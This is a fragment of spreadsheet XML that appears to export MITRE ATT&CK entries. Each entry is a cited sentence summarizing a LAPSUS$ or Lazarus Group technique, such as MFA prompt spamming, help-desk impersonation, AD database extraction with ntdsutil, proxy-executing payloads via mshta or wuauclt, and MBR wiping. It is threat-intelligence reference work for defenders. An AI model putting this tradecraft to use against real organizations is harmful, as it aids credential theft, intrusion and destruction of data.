    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used compromised credentials to access cloud assets within a target organization.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--ec5caf8f-0fb8-4c3b-bd31-08804ff2214e</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched public code repositories for exposed credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--72c044ec-4869-4273-aff9-10c14e3326ca</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for code repositories like GitLab and GitHub to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--2b7d9c6e-8149-4b2f-91a2-e80ec673e42d</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--0d9523d3-ab60-48df-b5c5-2778e1727439</t>
  </si>
  <si>
    <t xml:space="preserve">[LAPSUS$](https://attack.mitre.org/groups/G1004) has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.(Citation: MSTIC DEV-0537 Mar 2022) </t>
  </si>
  <si>
    <t>relationship--ea60aa14-d556-4031-9d3f-bb673f2d6f68</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</si>
  <si>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</si>
  <si>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relationship--a30f4d65-bb33-4c5f-b278-e8ec73de5bb1</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has obtained passwords and session tokens with the use of the Redline password stealer.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--956078f0-e1b1-4be7-9bf3-f03630ec3f1b</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used DCSync attacks to gather credentials for privilege escalation routines.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--bd785740-2234-4bc8-90b9-1d8b1e7f557b</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has reconfigured a victim's DNS records to actor-controlled domains and websites.(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--c6a104db-515e-4878-93f1-edfc0c242af9</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has deleted the target's systems and resources both on-premises and in the cloud.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--1b996e11-03b7-48fc-9ce2-cd08fdf0d07d</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--c0a23c9d-a972-46a9-9a86-a440bbfd5d1f</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) uploaded sensitive files, information, and credentials from a targeted organization for extortion or public release.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--0b33093f-14c3-485e-8d82-f04ebcbe6d01</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--816b2bbb-9d91-4cf9-86b2-ff68a9f82969</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used the AD Explorer tool to enumerate users on a victim's network.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--5235ff3c-646a-4608-b90e-394bc2c54330</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used the AD Explorer tool to enumerate groups on a victim's network.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--0c472bde-ea1e-48b4-bd55-a32f276b0b13</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has payed employees, suppliers, and business partners of target organizations for credentials.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--beaf6c2d-e416-4edc-8091-414eee53f604</t>
  </si>
  <si>
    <t>05 December 2022</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered employee email addresses, including personal accounts, for social engineering and initial access efforts.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--c2b48ab4-6a4f-4252-a40c-7f870276b5a7</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--7647807e-71b6-41e4-b0aa-f23e68b411cd</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--a360e9a6-541f-4026-9d50-70aa288e49ec</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</si>
  <si>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</si>
  <si>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relationship--55af723a-6ca6-449d-be8e-d61a067fbefd</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed information of target employees to enhance their social engineering lures.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--037e2e7e-5d23-48d6-90e6-796693a0caea</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed knowledge of team structures within a target organization.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--3f152371-cef7-405b-b586-ec87e774ccb4</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has called victims' help desk and impersonated legitimate users with previously gathered information in order to gain access to privileged accounts.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--570495a2-c010-4180-abb7-682e6e6528a3</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) acquired and used the Redline password stealer in their operations.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--5a86948b-4058-453a-aa8d-47cdc4346f41</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--fc5c0e5f-b730-4396-9922-7e2e91b4a106</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--a72a96fc-c76e-4c55-9ea6-4315246c15db</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--d17f93ce-f419-4297-a6dd-9d745df31b92</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has accessed local password managers and databases to obtain further credentials from a compromised network.(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--de075e77-f83e-4156-a40f-e7e475e15469</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has leverage NordVPN for its egress points when targeting intended victims.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--4393f669-4e67-4cd6-a89b-52907138fca7</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has purchased credentials and session tokens from criminal underground forums.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--e8183fad-e62c-47f0-8aeb-4f1d7fd36444</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has shut down virtual machines from within a victim's on-premise VMware ESXi infrastructure.(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--6e54e834-521f-4da8-b3ae-963185496a60</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--370fb415-02d5-416c-bb69-d629600dc14b</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has called victims' help desk to convince the support personnel to reset a privileged account’s credentials.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--60fc3c88-bff5-4a06-88f3-15715e4cafda</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has obtained tools such as RVTools and AD Explorer for their operations.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--1aa34972-7bed-4e2d-bf72-b7352677de60</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--e2e2fb8d-6b89-4d49-bea9-cca54ae3e56d</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</si>
  <si>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</si>
  <si>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relationship--64c83ccd-f074-4ff2-80c9-05d03f8fc9d3</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)</t>
  </si>
  <si>
    <t>relationship--565aa787-f255-45c6-9396-8a53bbb3950e</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has used VPS hosting providers for infrastructure.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--3e375d96-bc20-431e-ab35-f2e05fb88343</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>relationship--2325c0b2-fb89-44e1-9206-e495811f2907</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</si>
  <si>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</si>
  <si>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relationship--170e2f76-5b6a-4eee-8ea4-d1171368b4a9</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</si>
  <si>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</si>
  <si>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relationship--552ac18c-4fac-4cb0-aefc-811a10e1c320</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</si>
  <si>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</si>
  <si>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relationship--f60afd0d-68d1-4b71-bb07-b943e9542b2d</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>relationship--8c58cfe5-0b71-434c-939a-329b612d2337</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>relationship--53a66a44-0620-4edc-bb9d-c40cfcb17546</t>
  </si>
  <si>
    <t>23 March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</si>
  <si>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</si>
  <si>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relationship--7ca1b40d-d1de-48ab-b8ad-023ad9877def</t>
  </si>
  <si>
    <t xml:space="preserve">[Lazarus Group](https://attack.mitre.org/groups/G0032) has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.(Citation: Kaspersky ThreatNeedle Feb 2021) </t>
  </si>
  <si>
    <t>relationship--d39e7197-a9b3-4915-8cf0-98bbbd885cd5</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has digitally signed malware and utilities to evade detection.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>relationship--83f844ec-b321-4a9d-8c43-edbf6e006a6b</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</si>
  <si>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</si>
  <si>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relationship--1a40426a-355c-4d7e-b51c-e95a102b31e2</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has replaced `win_fw.dll`, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>relationship--daf75556-254a-41af-960d-5b1012c739e3</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a custom secure delete function to overwrite file contents with data from heap memory.(Citation: Novetta Blockbuster)</t>
  </si>
  <si>
    <t>relationship--27323a25-ef80-4519-b934-19f5ff090c70</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has collected data and files from compromised networks.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--3fe9b64a-6435-4592-9181-2ad50ee93044</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--ac47da26-22ae-43b9-947b-ed4ea6943d42</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has obtained SSL certificates for their C2 domains.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--41c193c1-8269-4a2e-9ed8-9dd51489a03f</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</si>
  <si>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</si>
  <si>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relationship--b348a960-f2f1-4832-aeb4-ac890c1e1c39</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</si>
  <si>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</si>
  <si>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relationship--ae61abba-14fb-4d4e-9f8e-a3b18500b449</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</si>
  <si>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</si>
  <si>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relationship--78ca7fcf-95b9-485c-a87b-2ac083312885</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.(Citation: US-CERT SHARPKNOT June 2018)(Citation: Novetta Blockbuster)</t>
  </si>
  <si>
    <t>relationship--b00c9e09-d98f-40b4-bc4e-0c3e9fe873e1</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has acquired domains related to their campaigns to act as distribution points and C2 channels.(Citation: CISA AppleJeus Feb 2021)(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>relationship--b24131fe-0d25-456e-a2da-58da3ff5bc17</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) delivered [RATANKBA](https://attack.mitre.org/software/S0241) and other malicious code to victims via a compromised legitimate website.(Citation: RATANKBA)(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>relationship--829f88fc-453a-40d1-8566-90dfe0934173</t>
  </si>
  <si>
    <t>04 February 2022</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a custom hashing method to resolve APIs used in shellcode.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>relationship--939b7c8a-3a2a-43a7-82e2-55f3b62c15da</t>
  </si>
  <si>
    <t>A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample performs reflective DLL injection.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>relationship--c055d228-a0e6-4b76-961a-1eebe99679f5</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has created new email accounts for spearphishing operations.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--eea8a891-7ebb-4589-9d36-6a801ff00818</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--7104b56f-06ef-4888-ab9b-fac77fea3097</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has exfiltrated data and files over a C2 channel through its various tools and malware.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>relationship--520f5440-740f-4efe-850e-ea4db340aef1</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>relationship--0a8ee649-e907-4a73-8513-3019b2d771a0</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--5a0ce8c4-e941-4bd0-8e70-6ca440a29b9d</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multiple proxies to obfuscate network traffic from victims.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--39fdd17c-5f59-4daf-bf14-95841b5ec248</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</si>
  <si>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</si>
  <si>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relationship--ab687dca-2741-4920-a71e-e0e0444809c5</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</si>
  <si>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</si>
  <si>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relationship--979812c4-939e-4a7e-96b3-348028db10ce</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</si>
  <si>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</si>
  <si>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relationship--bd745d11-93d8-45db-8a68-08a52383375a</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--2b9855a9-f381-4a3e-a0c2-80310374b165</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</si>
  <si>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</si>
  <si>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relationship--2426519f-c915-4c8f-8164-0d93dbbf0be1</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has restored malicious [KernelCallbackTable](https://attack.mitre.org/techniques/T1574/013) code to its original state after the process execution flow has been hijacked.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>relationship--bcee230a-c671-4c71-afbf-d6216aeee5b6</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) persistence mechanisms have used &lt;code&gt;forfiles.exe&lt;/code&gt; to execute .htm files.(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--09710ce1-9ed9-4c25-a86f-0a481174cc0d</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</si>
  <si>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</si>
  <si>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relationship--115562b8-9d7c-435e-af6e-0be6249742d0</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</si>
  <si>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</si>
  <si>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relationship--79904c38-8fb6-45e3-98f7-98856e08421f</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--97bf5604-4b99-4851-85ea-83018d90c82c</t>
  </si>
  <si>
    <t>03 February 2022</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has abused the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack process control flow and execute shellcode.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--c0337d13-da6a-4e2b-91a4-a389c6b4ee28</t>
  </si>
  <si>
    <t>01 March 2022</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware KiloAlfa contains keylogging functionality.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Tools)</t>
  </si>
  <si>
    <t>relationship--7f695d14-17e1-46c6-92eb-7c2f57fc6553</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</si>
  <si>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</si>
  <si>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relationship--670a7586-5833-4e00-903a-c699b9810c13</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</si>
  <si>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</si>
  <si>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relationship--5f055076-79d1-44e8-95cb-43fc515df2f6</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</si>
  <si>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</si>
  <si>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relationship--83bfee39-b6c9-48e6-8114-54b0c623a91f</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has developed custom malware for use in their operations.(Citation: CISA AppleJeus Feb 2021)(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>relationship--1754cf51-f712-4e7c-9108-fa276b9f1543</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a scheduled task named `SRCheck` to mask the execution of a malicious .dll.(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>relationship--d29db5f7-25cb-49e3-81da-04263e32b65c</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--bcc68931-0e79-4dc2-898d-3e553a7a9669</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;mshta.exe&lt;/code&gt; to execute HTML pages downloaded by initial access documents.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--12c617b6-9c95-46fd-a3ef-845be82ac237</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multi-stage malware components that inject later stages into separate processes.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>relationship--3cf183ef-05aa-47ad-b691-654c0648326a</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</si>
  <si>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</si>
  <si>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relationship--2c131932-4632-4866-845f-212cbe29756d</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--3faf013a-e1c4-494a-b2a1-6e9abef908b9</t>
  </si>
  <si>
    <t>Some [Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>relationship--800f3241-62f4-4eb4-b9a2-df62f67d27d6</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</si>
  <si>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</si>
  <si>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relationship--3afd226c-934f-44fd-8194-9a6dee5cba59</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</si>
  <si>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</si>
  <si>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relationship--83ba5b2c-b3fd-4558-a3f8-cef4c31e02bd</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used PowerShell to execute commands and malicious code.(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>relationship--5df525ae-d983-4fde-ac10-b07a820d9046</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</si>
  <si>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</si>
  <si>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relationship--699ddfef-6e95-42cf-b212-dc661f790adc</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</si>
  <si>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</si>
  <si>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relationship--0b255cef-7177-48b8-ade1-752314f90b7e</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</si>
  <si>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</si>
  <si>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relationship--39b735d3-c659-4d1a-8e7e-082c0f049c2d</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</si>
  <si>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</si>
  <si>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relationship--510616c2-f124-49b2-83a2-cac81d2d4155</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</si>
  <si>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</si>
  <si>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relationship--6ab291a5-8061-4ad4-a6a7-07a6142e4c27</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraCharlie uses RDP for propagation.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>relationship--c79796c1-88d6-4cd8-95d3-4f81d3755859</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has renamed system utilities such as &lt;code&gt;wscript.exe&lt;/code&gt; and &lt;code&gt;mshta.exe&lt;/code&gt;.(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--6441d8c3-861f-4ce3-9121-809d2b0d173b</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used rundll32 to execute malicious payloads on a compromised host.(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>relationship--7cd04afd-b216-468b-a4af-71700c9fbefd</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraAlfa accesses the &lt;code&gt;ADMIN$&lt;/code&gt; share via SMB to conduct lateral movement.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)</t>
  </si>
  <si>
    <t>relationship--e6cafa6a-22ce-49f7-8136-dc5a51c3aaeb</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--1cf34ba1-c2e4-4277-86fc-b511ae416a0e</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;schtasks&lt;/code&gt; for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021)</t>
  </si>
  <si>
    <t>relationship--b9259830-1b82-4303-bb5a-c0285a71f5ef</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has compromised servers to stage malicious tools.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--0dcce53a-3ac1-4528-8c34-f85569638740</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>relationship--411aae3a-f612-41bb-b2f0-1639d2cbc290</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>relationship--7b4ee7bc-3a27-4142-a9bd-f65787193e8b</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has created new Twitter accounts to conduct social engineering against potential victims.(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>relationship--c0807a3c-a298-47ef-8705-7d7ca55d446e</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has targeted victims with spearphishing emails containing malicious Microsoft Word documents.(Citation: McAfee Bankshot)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--061841f1-5814-41e3-94b5-536b8a52d062</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has sent malicious links to victims via email.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--5e28da21-d977-4488-a8dc-10bad0833374</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.(Citation: Google TAG Lazarus Jan 2021)</t>
  </si>
  <si>
    <t>relationship--ba9b20fb-04a8-403b-9549-c13a9bb2603c</t>
  </si>
  <si>
    <t>A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample encodes data with base64.(Citation: McAfee Lazarus Resurfaces Feb 2018)</t>
  </si>
  <si>
    <t>relationship--81682d49-acb2-4439-a7da-1a28126cea94</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</si>
  <si>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</si>
  <si>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relationship--4c06e313-2cde-494c-a8dc-449649a1afa6</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) lnk files used for persistence have abused the Windows Update Client (&lt;code&gt;wuauclt.exe&lt;/code&gt;) to execute a malicious DLL.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--883e2f79-5bf5-4e08-bb83-f1cd36907958</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</si>
  <si>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</si>
  <si>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relationship--4eec017c-8bf2-4eda-8c92-15926fc7e5aa</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</si>
  <si>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</si>
  <si>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relationship--4189f5b4-4c57-452a-a3fb-da5988804feb</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;net use&lt;/code&gt; to identify and establish a network connection with a remote host.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--f39a04e8-f4cf-482f-8d1a-7def044a03a0</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</si>
  <si>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</si>
  <si>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relationship--500130c0-d049-4e67-9bcc-d60a5f6dfd4c</t>
  </si>
  <si>
